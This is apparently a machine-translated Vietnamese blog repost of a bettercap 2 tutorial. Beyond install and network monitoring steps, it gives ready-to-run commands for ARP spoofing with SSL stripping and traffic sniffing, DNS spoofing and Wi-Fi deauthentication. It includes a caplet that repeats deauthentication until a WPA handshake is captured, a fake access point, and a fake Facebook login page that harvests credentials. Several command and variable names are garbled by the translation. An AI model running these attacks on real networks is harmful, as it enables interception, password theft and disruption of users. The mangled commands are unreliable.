Bettercap 2.x : Con dao trinh sát mạng

[full_width] Vào cuối tháng 2 năm 2018, bettercap 2 đã được phát hành và kể từ đó phiên bản này...

[full_width]




Screenshot_2018-08-11 bettercap
Vào cuối tháng 2 năm 2018, bettercap 2 đã được phát hành và kể từ đó phiên bản này đang tích cực phát triển, các chức năng mới được thêm vào nó. bettercap 1.6 không được hỗ trợ và không còn được hỗ trợ.
Trong các phiên bản mới nhất của bettercap, có rất nhiều thay đổi: chương trình được viết lại bằng ngôn ngữ lập trình khác, thay vì Ruby, sử dụng Go. Nhờ sự thay đổi ngôn ngữ và các phương pháp khác, năng suất tăng lên đáng kể, tối ưu hóa việc sử dụng CPU và bộ nhớ.
Mô hình tương tác với chương trình đã thay đổi: trước khi nó là tiện ích dòng lệnh, nhiều tùy chọn đã được sử dụng trong khi khởi chạy. Một phiên bản mới cũng có thể được chạy ở chế độ không tương tác, sử dụng các tùy chọn, nhưng giờ đây đã có chế độ tương tác, cũng như API.
Ngay cả mục đích của chương trình cũng đã thay đổi: nó từng là một nền tảng mô-đun để thực hiện các cuộc tấn công trung gian phức tạp, giờ đây, ngoài việc hỗ trợ các cuộc tấn công trung gian, còn có chức năng giám sát mạng Giám sát và tấn công mạng không dây 802.11 và BLE.
Các chức năng của chương trình trở nên nguyên tử hơn, ví dụ, để khởi động cuộc tấn công giữa người phổ biến nhất, bao gồm giả mạo và đánh hơi ARP, bây giờ bạn cần nhập một số lệnh (trước đây chỉ có một tùy chọn). Điều này làm tăng tính linh hoạt của việc sử dụng chương trình, nhưng đồng thời làm phức tạp việc sử dụng. Để tự động hóa công việc của chương trình và đơn giản hóa việc sử dụng, người ta có thể sử dụng các máy tính bảng điều khiển công việc của bettercap và các mô-đun của nó. Ví dụ về caplets được thu thập trong kho https://github.com/bettercap/caplets .
Và điều này thậm chí không phải là tất cả những thay đổi! Điều đáng nói là các trình cắm Go gốc được hỗ trợ (thông qua mô-đun pack.proxy ), một số mô-đun hỗ trợ ngôn ngữ tập lệnh JavaScript để xử lý dữ liệu và kiểm soát hành vi của chương trình, và chính chương trình và máy tính bảng của nó hỗ trợ các lệnh hệ thống gốc.
Nói chung, nó chỉ là một chương trình khác, trong đó mọi thứ đều mới.

Cách cài đặt bettercap 2 trong Kali Linux

Trong kho lưu trữ Kali Linux, đã có bestcap, nhưng tại thời điểm viết bài, đã có phiên bản 1.6.2 lỗi thời. Để kiểm tra phiên bản nào của bettercap hiện có sẵn để cài đặt từ kho chính thức, hãy chạy:
1
apt-cache show bettercap | grep 'Version: '
Nếu có phiên bản 2.x, thì bạn chỉ cần cài đặt nó:
1
sudo apt install bettercap

Tải xuống và cài đặt phiên bản mới nhất của bettercap

Xóa phiên bản lỗi thời của bettercap nếu nó được cài đặt trước đó:
1
2
sudo apt remove bettercap
sudo rm /usr/local/bin/bettercap
Sửa lỗi cho một thư viện đã được cài đặt:
1
ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.8.1 /usr/lib/x86_64-linux-gnu/libpcap.so.1
Tải xuống kho lưu trữ với tệp nhị phân của phiên bản mới nhất của bettercap:
1
wget "https://github.com`curl -s https://github.com/bettercap/bettercap/releases | grep -E -o '/bettercap/bettercap/releases/download/v[0-9.]+/bettercap_linux_amd64_[0-9.]+zip' | head -n 1`"
Chúng tôi giải nén, di chuyển, làm sạch và kiểm tra:
1
2
3
4
unzip bettercap_linux_amd64_*zip
sudo mv bettercap /usr/local/bin/
rm README.md LICENSE.md bettercap_linux_amd64_*.zip
bettercap -h
Cài đặt bettercap từ mã nguồn sẽ được thảo luận ở cuối bài viết.

hướng dẫn sử dụng bettercap

Nhờ có caplets và script, có thể thực hiện một loạt các cuộc tấn công và tấn công lừa đảo dựa trên thao tác dữ liệu, điểm khởi đầu của nó là một cuộc tấn công trung gian. Vì lý do này, không dễ để viết hướng dẫn sử dụng đầy đủ.
Để tính gần đúng khả năng của chương trình, hãy đọc tài liệu và cũng có thể làm quen với kho lưu trữ của caplets: nhiều người trong số họ có ý kiến ​​trong mã nguồn giúp hiểu chính xác chương trình sẽ làm gì.
Sau đây, các ví dụ rất đơn giản về việc bắt đầu bettercap sẽ được xem xét. Hãy bắt đầu với việc sử dụng một phiên tương tác, để làm điều này, hãy chạy :
1
sudo bettercap

Giám sát mạng cục bộ

Để liệt kê các máy chủ được phát hiện trên mạng cục bộ, gõ:
1
net.show
Đây là một phương pháp giám sát thụ động, vì việc tìm kiếm máy chủ dựa trên việc đọc bộ đệm ARP.
Để thoát khỏi chương trình, nhập q hoặc nhấn CTRL + z .
Và mô-đun net.probe tích cực tìm kiếm các máy chủ, gửi các gói UDP giả đến mọi IP có thể có trong mạng con. Để kích hoạt mô-đun này:
1
net.probe on
Chúng tôi xem xét các máy chủ được phát hiện:
1
net.show
Đây là một phương thức hoạt động vì các nhà phân tích mạng sẽ thấy rằng một máy tính có máy chủ tốt hơn sẽ gửi các gói dữ liệu.
Với bettercap, bạn có thể liên tục theo dõi trạng thái mạng bằng cách lấy dữ liệu trên màn hình theo thời gian thực, vì điều này, hãy chạy tuần tự:
1
2
net.probe on
ticker on
Lệnh net.probe đầu tiên , như chúng tôi đã phát hiện ra sớm hơn một chút, cho phép tìm kiếm chủ động cho các máy chủ và lệnh thứ hai được sử dụng để thực hiện một tập lệnh đã cho theo định kỳ. Vì chúng tôi không chỉ định lệnh nào sẽ thực thi, nên các lệnh được thực thi mặc định là rõ ràng; net.show, kết quả là một hiệu ứng thú vị: trong nền nó liên tục tìm kiếm máy chủ và thông tin được hiển thị trên màn hình theo thời gian thực.

Chế độ tương tác và không tương tác. Các tùy chọn -eval và -caplet.

 Caplets

Nếu bạn không thoải mái để chạy bettercap tương tác mọi lúc, bạn có thể sử dụng tùy chọn -eval , sau đó chỉ định các lệnh mà bạn muốn chạy.  ví dụ trước tương đương với điều này:

1
sudo bettercap -eval "net.probe on; ticker on"
Ngay trong phiên tương tác, bettercap, bạn có thể thực thi các lệnh hệ thống. Ví dụ: bộ lệnh sau đây kiểm tra xem có kết nối nào với mạng không:
1
ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected"
Lệnh tương tự này (bộ lệnh) có thể được thực hiện ngay trong phiên tương tác, ngay trước khi lệnh đầu tiên đặt dấu chấm than:
1
!ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected"
Bây giờ chúng tôi sẽ theo dõi mạng cục bộ và truy cập Internet. Chúng tôi triển khai một tìm kiếm hoạt động cho các máy chủ địa phương:
1
net.probe on
Chúng tôi đặt giá trị của biến ticker.commands , hiện có ba lệnh: hai lệnh đã được biết là các lệnh nội bộ bettercap (chúng rõ ràng; net.show; ) và một lệnh nữa là tập lệnh của hệ thống:
1
set ticker.commands 'clear; net.show; !ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected"'
Nếu muốn, bạn có thể tăng thời gian lên ba giây (mặc định là một giây):
1
set ticker.period 3
Chạy nhiệm vụ theo chu kỳ:
1
ticker on
Trong kết quả thực hiện, hãy chú ý đến dòng ‘Đã kết nối’ mới:
Sử dụng tùy chọn -eval , bạn có thể chạy tất cả theo cách này:
1
sudo bettercap -eval 'net.probe on; set ticker.commands "clear; net.show; !ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected""; set ticker.period 3; ticker on'
Nhưng ngoài tùy chọn -eval , còn có tùy chọn -caplet , cũng cho phép bạn chạy chương trình với các lệnh được chỉ định.
Hãy tạo caplet đầu tiên của chúng tôi. Để thực hiện việc này, hãy tạo một tệp văn bản có tên netmon.cap (bạn có thể chọn bất kỳ tên nào):
1
gedit netmon.cap
Và chỉ cần sao chép tất cả các lệnh của chúng tôi vào nó, mà chúng ta đã nhập trong phiên tương tác, chúng ta sẽ nhận được tệp sau:
1
2
3
4
5
net.probe on
# Note the absence of quotes in this example and the quotes in the previous ones:
set ticker.commands clear; net.show; !ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected"
set ticker.period 3
ticker on
Bây giờ hãy chạy bettercap với tùy chọn -caplet , sau đó chúng tôi sẽ chỉ định đường dẫn đến tệp bằng caplet:
1
sudo bettercap -caplet ./netmon.cap

Làm thế nào để chạy giả mạo và đánh hơi trong bettercap

Hãy bắt đầu với việc ra mắt giả mạo ARP:
1
arp.spoof on
Theo mặc định, cuộc tấn công được thực hiện trên toàn bộ mạng con, do đó, nếu giả mạo ARP hoạt động kém, hãy đặt các mục tiêu IP bằng cách sử dụng biến arp.spoust.target . Giá trị của nó có thể là một IP hoặc một số IP được phân tách bằng dấu phẩy, ví dụ:
1
set arp.spoof.targets 192.168.0.90
Để xem tất cả máy chủ có sẵn trong mạng cục bộ của bạn:
1
net.show
Giá trị của các biến phải được đặt trước khi mô đun tương ứng được chạy. Nếu bạn cần thay đổi giá trị của một biến của mô-đun đang chạy, hãy dừng mô-đun, đặt giá trị mới và khởi động lại mô-đun, ví dụ:
1
2
3
arp.spoof off
set arp.spoof.targets 192.168.0.90
arp.spoof on
Đối với sniffer, nếu muốn, bạn có thể giảm mức độ chi tiết:
1
set net.sniff.verbose false
Chạy trình thám thính:
1
net.sniff on

Proxy HTTP trong suốt

Để phân tích lưu lượng HTTP, bạn phải bật http.proxy . Nếu nó được sử dụng cùng với giả mạo, tất cả lưu lượng HTTP sẽ được chuyển hướng đến nó và, nếu cần, nó sẽ tự động xử lý chuyển tiếp cổng.
Nếu bạn muốn sử dụng sslstrip , bạn phải thay đổi giá trị của biến http.proxy.sslstrip , được đặt thành false theo mặc định:
1
set http.proxy.sslstrip true
Để bật proxy HTTP minh bạch:
1
http.proxy on
Một danh sách đầy đủ các lệnh để tấn công IP cục bộ 192.168.0.90, do đó, việc giả mạo ARP liên tục của địa chỉ này sẽ được thực hiện, điều này sẽ khiến lưu lượng được chuyển hướng đến máy của kẻ tấn công, đến một proxy HTTP trong suốt, trong đó, nếu có thể, việc hạ cấp từ HTTPS xuống HTTP sẽ được thực hiện bằng sslstrip , tính xác thực của trình thám thính được hạ xuống để hiển thị dữ liệu thực sự quan trọng:
1
2
3
4
5
6
set http.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets 192.168.0.90
arp.spoof on
http.proxy on
net.sniff on
Để tấn công toàn bộ mạng con, hãy bỏ qua  dòng IP arp.spoust.target .

Giả mạo DNS trong bettercap

Truy vấn DNS được thay thế bằng mô-đun dns.spfe . Bạn có thể cấu hình nó trước khi bắt đầu nó.
Theo mặc định, tất cả các tên miền sẽ bị giả mạo, nếu bạn muốn thay đổi điều này, sau đó đặt chúng theo giá trị của biến dns.spoust.domains làm danh sách được phân tách bằng dấu phẩy. Ví dụ: tôi chỉ muốn giả mạo hai tên miền suip.biz và mi-al.ru, sau đó:
1
set dns.spoof.domains suip.biz, mi-al.ru
Theo mặc định, máy chủ DNS gửi IP trỏ đến địa chỉ giao diện của máy mà máy chủ được khởi chạy. Địa chỉ IP thay đổi thông qua biến dns.spoust.address  :
1
set dns.spoof.address desired_IP
Mô-đun này sẽ chỉ đáp ứng các yêu cầu nhắm mục tiêu đến PC cục bộ; để đáp ứng mọi thứ, hãy đặt giá trị của biến dns.spoust.all  thành true :
1
set dns.spoof.all true
Để chạy mô-đun:
1
dns.spoof on

Máy chủ web tích hợp trong bettercap

Để xử lý các yêu cầu đến máy chủ web, bạn có thể sử dụng máy chủ được cài đặt trên hệ thống của mình, ví dụ: Kali Linux có Apache và bạn chỉ cần chạy nó:
1
systemctl start apache2
Bettercap cũng có một máy chủ web đơn giản tích hợp có thể hiển thị các trang HTML và các tệp tĩnh khác, chẳng hạn như JavaScript, CSS, hình ảnh, v.v.
Bạn phải chỉ định địa chỉ của thư mục máy chủ bằng cách thay đổi giá trị của biến http.server.path  :
1
set http.server.path /path/to/folder
Để khởi động máy chủ web (ví dụ: máy chủ hệ thống, phải dừng Apache, vì có thể có xung đột do thực tế là các chương trình khác nhau cố gắng nghe trên cùng một cổng):
1
http.server on

Giám sát mạng Wi-Fi

Đây là một tính năng tốt hơn mới. Nhân tiện, hỗ trợ Bluetooth Low Energy cũng đã được thêm vào.
Để làm việc với Wi-Fi, bạn cần sử dụng tùy chọn -iface , sau đó bạn có thể chỉ định tên của giao diện không dây:
1
sudo bettercap -iface wlan0
Trong trường hợp bạn sẽ có lỗi được đưa ra bởi lệnh trước đó, ví dụ:
1
2
Can't restore interface wlan0 wireless mode (SIOCSIWMODE failed: Bad file descriptor).
Please adjust manually.
Sau đó thoát bettercap và tự cài đặt giao diện không dây sang chế độ màn hình. Ví dụ, như sau:
1
2
3
sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up
Bây giờ giao diện không dây đang ở chế độ màn hình, hãy chạy lại bestcap và nhập lệnh:
1
wifi.recon on
Nó bắt đầu phát hiện thiết bị Wi-Fi:
Nếu bạn muốn giới hạn chỉ giám sát một số kênh nhất định, thì hãy thực hiện một lệnh như thế này (nó chỉ đặt bước nhảy trên ba kênh đầu tiên):
1
wifi.recon.channel 1,2,3
Nhân tiện, nếu sau này bạn cần xóa danh sách các kênh (làm cho chương trình nhảy trên tất cả các kênh), thì lệnh sau được sử dụng cho việc này:
1
wifi.recon.channel clear
Để hiển thị kết quả, gõ:
1
wifi.show
Nhóm lệnh tiếp theo sẽ bắt đầu thu thập thông tin về các thiết bị Wi-Fi, sẽ hiển thị bảng có danh sách đầy đủ các điểm truy cập được phát hiện, cũng như danh sách 20 lần phát hiện gần nhất:
1
2
3
set ticker.commands 'clear; wifi.show; net.show; events.show 20'
wifi.recon on
ticker on

Chụp bắt tay trong bettercap

Vâng, giờ đây, Bettercap đã biết cách thực hiện điều này và cũng biết cách thực hiện cuộc tấn công hủy cấp quyền.
Nếu chúng ta muốn bắt một cái bắt tay từ một điểm truy cập cụ thể, thì chúng ta cần biết kênh mà nó hoạt động. Điều này là đủ nếu chúng ta sẽ chờ thụ động để máy khách kết nối / kết nối lại với AP.
Để thực hiện tấn công hủy cấp quyền, chúng tôi cần biết BSSID của điểm truy cập (trong trường hợp này, cuộc tấn công sẽ được thực hiện đối với tất cả khách hàng) hoặc BSSID của khách hàng (trong trường hợp này, cuộc tấn công sẽ được thực hiện đối với một khách hàng) .
Hãy bắt đầu với cấu hình sniffer. Hãy làm cho nó bằng lời nói:
1
set net.sniff.verbose true
Thiết lập bộ lọc cho các khung bắt tay:
1
set net.sniff.filter ether proto 0x888e
Chúng tôi thiết lập lưu dữ liệu nhận được vào tệp wpa.pcap :
1
set net.sniff.output /root/wpa.pcap
Chạy trình thám thính:
1
net.sniff on
Sniffer được chạy theo cùng một cách mọi lúc. Các giá trị tiếp theo của các biến phụ thuộc vào mục tiêu bị tấn công.
Mục tiêu tôi muốn tấn công đang hoạt động trên kênh 8, vì vậy tôi đặt kênh:
1
wifi.recon.channel 8
Chạy phân tích mạng:
1
wifi.recon on
Tôi quan tâm đến AP với BSSID 50: 46: 5d: 6e: 8c: 20, tôi có thể kích hoạt bộ lọc:
1
wifi.recon 50:46:5d:6e:8c:20
Hai lệnh sau là tùy chọn, chúng sẽ định kỳ xóa màn hình và hiển thị bảng với các trạm cơ sở đã nhìn thấy (bạn có thể thấy nếu có bất kỳ máy khách nào tại Điểm truy cập bị tấn công), nếu bạn không muốn, hãy bỏ qua các lệnh này:
1
2
set 'ticker.commands clear; wifi.show'
ticker on
Chúng tôi tiến hành hủy cấp quyền. Cuộc tấn công có thể được thực hiện dưới hai hình thức:
1
wifi.deauth AP-BSSID
hoặc là:
1
wifi.deauth CLIENT-BSSID
Trong trường hợp đầu tiên, tất cả các khách hàng sẽ được hủy cấp phép, trong trường hợp thứ hai, chỉ một khách hàng được chỉ định sẽ được hủy cấp phép. Tôi muốn hủy cấp phép tất cả các máy khách điểm truy cập, sau đó là lệnh của tôi:
1
wifi.deauth 50:46:5d:6e:8c:20
Có thể mở một tệp có khung đã chụp để xác minh trong Wireshark:
Để lọc bắt tay, hãy sử dụng bộ lọc:
1
llc.type == 0x888e
Hoặc bộ lọc:
1
eapol
Ngoài bettercap, đã có đủ các chương trình có thể bắt tay. Ưu điểm của bettercap là chúng ta có thể tự động hóa quy trình.
Ví dụ: lệnh sau kiểm tra tệp chụp và hiển thị thông tin về (các) cái bắt tay nếu chúng được tìm thấy ở đó:
1
tshark -r /root/wpa.pcap -R 'eapol' -2 2>/dev/null
Lệnh bằng lời nói hơn một chút:
1
if [ "`tshark -r /root/wpa.pcap -R 'eapol' -2 2>/dev/null`" ]; then echo "Got handshake!"; else echo "Nothing"; fi;
Chúng ta cần lệnh trước để viết một caplet, nó sẽ hoạt động theo logic sau:
  1. Khi bắt đầu, khởi chạy một sniffer để bắt tay
  2. khởi động cuộc tấn công hủy cấp quyền
  3. kiểm tra xem cái bắt tay đã được chụp chưa
  4. nếu bắt tay được bắt – tắt máy tốt hơn
  5. nếu bắt tay không được bắt, quay lại bước 2
Đối với điều này, tôi tạo một tệp HS_capture_50465d6e8c20.cap với nội dung sau:
1
2
3
4
5
6
7
số 8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Setting up the sniffer
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output /root/wpa.pcap
net.sniff on
# Configuring and starting the analysis of wireless networks; channel and BSSID replace with your values
wifi.recon.channel 8
wifi.recon on
sleep 20
wifi.recon 50:46:5d:6e:8c:20
# Performing the deauthentication attack, sleeping for 60 seconds, checking if a handshake was captured,
# if yes, then quitting bettercap.
# Note that if you changed the name of the file where the handshake is saved, you also need to change
# it here - /root/wpa.pcap, and also replace BSSID with the attacked AP
set ticker.commands wifi.deauth 50:46:5d:6e:8c:20; sleep 60; !'if [ "`tshark -r /root/wpa.pcap -R 'eapol' -2 2>/dev/null`" ]; then echo "Got handshake! Quit."; sleep 1; pkill -1 bettercap; else echo "Yet not captured"; fi;'
# Period of the cycle - only one second is set here, because in the previous set of commands there is a sleep 60;
# which sets the sleep for 60 seconds:
set ticker.period 1
# Run cyclic execution of commands
ticker on

1
sudo bettercap -iface wlan0 -caplet ./HS_capture_50465d6e8c20.cap
Chương trình sẽ hoạt động cho đến khi bắt tay. Nhưng sau khi bắt tay, bettercap sẽ hoàn thành công việc của mình và không còn làm phiền khách hàng mạng.

Tạo một điểm truy cập giả mạo

Trong số các chức năng Wi-Fi, có thể tạo điểm truy cập giả mạo có hoặc không có mã hóa.
Tạo điểm truy cập giả “Banana” bằng BSSID DE: AD: BE: EF: DE: AD trên kênh 5 mà không cần mã hóa:
1
2
3
4
5
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false
wifi.recon on; wifi.ap
Như bạn có thể thấy, có rất nhiều tùy chọn cho tự động hóa và các cuộc tấn công kết hợp khác nhau, bao gồm các cuộc tấn công tự động dựa trên kỹ thuật xã hội.

Đánh cắp mật khẩu Facebook

Các fb-phish.cap Applet cho thấy một giả trang đăng nhập Facebook trên cổng 80, ngắt nỗ lực đăng nhập bằng http.proxy , in chứng chỉ, và chuyển hướng mục tiêu đến Facebook thực sự.
Trong cặp có tệp fb-phish.js , đây là tập lệnh cho mô-đun http.proxy .
Bạn cần quan tâm đến việc tạo một trang đăng nhập giả và khởi động máy chủ. Trong phần này, bạn sẽ được tệp Makefile trợ giúp với các hướng dẫn (nếu bạn đã tải xuống kho lưu trữ caplet, tại dòng lệnh Bash thực thi):
1
2
cd caplets/www/
make
Sau đó trong bettercap:
1
2
3
4
5
6
7
set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/
set http.proxy.script caplets/fb-phish.js
http.proxy on
http.server on

Thu thập các yêu cầu HTTP

Thực hiện một cuộc tấn công giả mạo ARP trên toàn bộ mạng (theo mặc định) hoặc trên một máy chủ (sử dụng -eval như mô tả), HTTP và HTTPS đánh chặn yêu cầu với các http.proxy và https.proxy mô-đun và đổ chúng bằng cách sử dụng http-req-dumsp tập lệnh proxy .js .

Thu thập thông tin đăng nhập và mật khẩu với các hình thức vô hình

Bản chất của cuộc tấn công là như sau: nếu trên trang web bạn đã nhập thông tin đăng nhập và mật khẩu trước đó, thì nếu có một biểu mẫu trên trang, trình duyệt sẽ tự động điền vào dữ liệu đã nhập trước đó. Firefox thực hiện điều này ngay lập tức, Chrome yêu cầu bất kỳ tương tác người dùng nào – ví dụ: nhấp vào bất kỳ đâu trên trang web. Hình thức này có thể là vô hình. Vì vậy, kẻ tấn công tiêm vào các trang của trang web một hình thức vô hình mà chính trình duyệt nhập vào thông tin đăng nhập và mật khẩu, biểu mẫu truyền dữ liệu cho kẻ tấn công.

Chuyển hướng truy vấn DNS IPv4 bằng phản hồi DHCPv6

Bản chất gần đúng là trong các phiên bản Windows hiện đại, hệ thống được đặt để ưu tiên cho IPv6. Kẻ tấn công trả lời các tin nhắn DHCPv6, cung cấp địa chỉ IPv6 liên kết cục bộ và chỉ định máy chủ của kẻ tấn công là máy chủ DNS. Tiếp theo, cuộc tấn công giả mạo DNS được thực hiện.
Cuộc tấn công được thực hiện trong mitm6.cap .

Kiểm tra tập lệnh http.proxy

Các proxy-script-test.cap plugin sẽ giúp bạn kiểm tra kịch bản làm việc JavaScript. Trong cặp có tệp proxy-script-test.js .

Mật khẩu sniffer

caplet Simple-password-sniffer.cap là một ví dụ thực sự rất đơn giản về tìm kiếm dữ liệu dựa trên biểu thức thông thường. Nó sử dụng các lệnh:
1
2
set net.sniff.regexp .*password=.+
set net.sniff.output passwords.cap

Thay đổi lời nhắc của phiên giao dịch tốt hơn

Bạn có thể tùy chỉnh lời nhắc mà bạn nhập lệnh. Bao gồm bạn có thể hiển thị trong đó thông tin hữu ích. Một ví dụ với đầu ra thống kê được chứa trong test-prompt-stats.cap .

Thay đổi nội dung của các trang web được yêu cầu

Các web override.cap caplet ghi đè bất kỳ trang được nạp với một trong những kẻ tấn công quy định. Cặp này là tệp web-override.js , đây là mô-đun http.proxy và nó mô tả các hành động được thực hiện, ví dụ: trang nào sẽ hiển thị.
Bạn có thể viết các caplets của riêng bạn, nếu bạn muốn, bạn có thể đưa ra các ví dụ thú vị để thêm vào kho lưu trữ.

Cài đặt bettercap từ mã nguồn trong Kali Linux

Bạn phải cài đặt trình biên dịch Go .
Mở tệp .bashrc trong thư mục người dùng bằng bất kỳ trình soạn thảo văn bản nào:
1
gedit ~/.bashrc
Và để tạo các biến môi trường mới, hãy thêm các dòng sau vào tệp này:
1
2
3
export GOPATH=/home/git/go
export GOROOT=/usr/local/src/go
export PATH=${PATH}:$GOROOT/bin:/home/git/go/bin
1
Khi bạn đã sẵn sàng, hãy lưu các thay đổi của bạn và đóng tệp.
Những thay đổi này sẽ có hiệu lực sau khi khởi động lại. Thay vì khởi động lại máy tính, hãy chạy:
1
source ~/.bashrc
Lệnh sau sẽ tự động phát hiện và tải xuống phiên bản mới nhất của tệp ngôn ngữ Go:
1
wget `curl -s https://golang.org/dl/ | grep -E -o 'https://[a-z0-9./]{5,}go[0-9.]{3,}linux-amd64.tar.gz' | head -n 1`
Trích xuất kho lưu trữ đã tải xuống:
1
tar zxf go*.linux-amd64.tar.gz
Thay đổi thư mục thành $ GOROOT , mà chúng tôi đã chỉ định trong ~ / .bashrc .
1
sudo mv go $GOROOT
Cài đặt các gói cần thiết để biên dịch:
1
sudo apt install bison byacc libpcap0.8-dev pkg-config libnetfilter-queue-dev
Sửa lỗi cho một thư viện đã được cài đặt:
1
ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.8.1 /usr/lib/x86_64-linux-gnu/libpcap.so.1
Tải về mã nguồn, biên dịch, cài đặt:
1
2
3
go get github.com/bettercap/bettercap
cd $GOPATH/src/github.com/bettercap/bettercap
make build && sudo make install
Để cập nhật chương trình:
1
2
3
go get -u github.com/bettercap/bettercap
cd $GOPATH/src/github.com/bettercap/bettercap
make build && sudo make install

Phần kết luận

Như bạn có thể thấy, bettercap từ một chương trình đơn giản và thú vị dành cho các cuộc tấn công trung gian đã phát triển thành một công cụ đa chức năng mạnh mẽ.
Để đơn giản hóa các hoạt động thường ngày, bạn có thể viết các chú thích nhỏ trong một số lệnh: ví dụ: để chạy đánh hơi trên mạng cục bộ hoặc để thu thập thông tin về mạng Wi-Fi.

Nguồn: https://hackerzambie.wordpress.com/2019/09/26/bettercap-2-x-con-dao-trinh-sat-mang/

COMMENTS

Tên

.:: Connect Trojan ::.,111,.htaccess,2,0-day,3,2017,2,Add-on,16,Affiliate,1,Anotador,1,AutoIT,17,BackDoor,1,Bán Sách,13,banhangonline,1,Bảo Mật,173,Bất Động Sản Tại Tiền Giang,5,Bestsellers,13,Binder,1,blog,31,Blogger,4,Blogger Template,1,Botnet,3,Brute,1,Bug Bounty,1,Bypass,10,camera,1,ceh,1,Châu Tinh Trì,2,Checked,6,Chrome,21,Code,5,coin hive,1,Coin-Hive,2,CoinHive,1,Connect Trojan,342,Connect Trojan ::.,1,Cổ Tích,2,Crack,3,Crypto,5,CSRF,5,CSS,2,Cuộc Sống,1,Dau tu,8,DDoS,6,Designer,1,Dich vụ,1,DNS,4,Download,2,du-an,3,DVD LUMION Tiếng Việt của anh Dũng Già Pro,1,Đam Mỹ,1,điện,1,Đồ Họa,215,Đô Thị,16,e11.me,1,ebook,17,ebook free,295,eBook Phệ Hồn Nghịch Thiên,1,eBook Thịnh Thế Địch Phi,1,Encrypt,1,Encryption,1,epub,76,epub [Tiên hiệp],1,ET-Logger,1,exploit,23,Exploitation,1,Extractor,2,facebook,69,FireFox,15,Flood,2,Forensic,7,full prc,2,game,177,Gerador,3,Gerenciador,1,Get Root,3,GHDB,3,Giả Tưởng,1,giaitri,1,Google,15,H&Y Shop,2,Hacker,3,Hacking,16,Hacking and Security,6,Hacking Tools,36,Hành Động,3,He Thong Site Phim,25,Hijacking,6,Hình Sự,1,hivecoin.hive coin,1,Hỏi Xoáy Đáp Xoay Trên VTV3,1,HTML,1,Huyền Ảo,92,Hướng dẫn Internet cơ bản,1,IFTTT,703,Imgur,2,Infographic,1,Information Disclosure,1,Internet Explorer,3,IT News,39,J2TeaM,29,J2TeaM Tools,9,JavaScript,6,Javascript Injection,3,Juno_okyo's Blog,23,Khóa Học,32,Khóa Học kiếm tiền online với accesstrade,5,khoá học miễn phí,16,Khóa học Photoshop,19,Khóa học sử dụng mã độc và phòng chống mã độc,2,Khoa Huyễn,6,khuyến mãi,16,kiemhiep,9,Kiếm Hiệp,20,Kiếm Tiền MMO,34,kiếm tiền rút gọn link,1,KilerRat,1,Kinh Dị,24,Kinh Dị - Ma,4,Kinh Doanh,73,kinhdi,1,kinhdoanh,5,KRACK Attacks,1,Lãng mạn,1,lazada,1,Lập trình,2,Lịch Sử,5,Linux,1,Local Attack,2,Logins/Cadastro,1,Lỗi Web,1,Lược Sử Hacker,2,Mã Giảm Giá,2,Mã Hóa,48,Malware,3,Master-Code,31,Máy Tính,1,Metasploit,2,Microsoft,4,mobile hacking,2,monero,1,Movie,25,MySQL,1,NEW PRODUCTS,19,NGHỆ THUẬT ẨN MÌNH,13,ngontinh,10,Ngôn Tình,151,nhà đất,1,Nhà Đất Gò Công,1,Nhân Vật Lịch Sử,2,Nhật Bản,1,Nhựt Trường Group,1,NjRat,5,Nước,1,open redirect,1,Oracle,1,Path Disclosure,2,pdf,76,Pen-Test,6,Pentest Box,9,Phan mem Internet,1,phanmem,23,phanmemdienthoai,3,phanmemmaytinh,10,phần mềm,11,Phim 18,2,Phim 2012,1,Phim 3D,1,Phim Âm Nhạc,2,Phim Bộ,39,Phim Chiến Tranh,5,Phim Dã Sử - Cổ Trang,6,Phim Đài Loan,6,Phim Đề Cử,4,Phim Hài Hước,26,Phim Hàn Quốc,33,Phim HD Chất Lượng Cao,5,Phim Hoạt Hình,2,Phim Hot,1,Phim Hồng Kông,20,Phim HQ,2,Phim Kinh Dị,8,Phim lẻ,4,Phim Mới 2011,2,Phim Mới 2012,1,Phim Mới 2015,1,Phim Nhật Bản,4,Phim SD,3,Phim Thái Lan,6,Phim Thần Thoại,4,Phim Tình Cảm,35,Phim Trung Quốc,37,Phim Truyền Hình,19,Phim Viễn Tưởng,1,Phim Võ Thuật,36,Phim Xã Hội Đen,1,Phishing,5,PHP,16,Plugin,1,Port,1,post mẫu,1,prc,77,Programming,15,Python,1,Quảng Cáo,1,rat,457,Recovery,3,Remote Code Execution,1,Remote Desktop,1,Reverse Engineering,6,review,3,rút gọn link,1,sach,47,Sách,37,Sách Nghệ Thuật Sống,12,sách nói,1,Sách Tâm Linh,1,Sách Tiếng Anh,2,sachiep,2,Sản Phẩm,1,Sắc Hiệp,16,Scam,1,Scanner,10,Security,66,SEO,5,share,1,Shell,5,shop,1,Social Engineering,4,Software,22,Source Unity,1,SQL injection,21,Sức Khỏe,1,Symlink,3,Tài Chính,1,Tài chính cá nhân,2,Tài Liệu,1,Tản mạn,7,Taudio,2,Tâm lý xã hội,1,tấn công,1,Testador,1,Thái Lan,2,Tham Khảo,3,thamkhao,11,them,1,Thiệp Cưới,1,Thiết Kế Web,30,Thời Trang,2,Thủ Thuật Hacking,53,Thuyết Minh,1,tienhiep,5,Tiên Hiệp,123,Tiểu Thuyết,94,tiki,3,TIL,8,Tin Tức,52,Tips,39,tool,1,Tool Hack,14,Tools,9,Tổng Hợp,1,Tricks,26,Trinh thám,1,trojan original,48,Trọng sinh,11,Trộm mộ,1,Trung Quốc,1,Truyện,1,Trương Định,110,Tu Chân,2,TUTORIALS,124,Twitter,1,Ung_Dung,4,Upload,1,usb,1,vanhoc,11,văn học,6,vBulletin,7,video,16,Vietsub,1,Việt Nam,4,Virus,4,Võ Thuật,3,Võng Du,5,Vulnerability,19,Web Developer,15,webmau,5,WHMCS,3,WiFi,2,wiki lỗi máy tinh,1,wiki 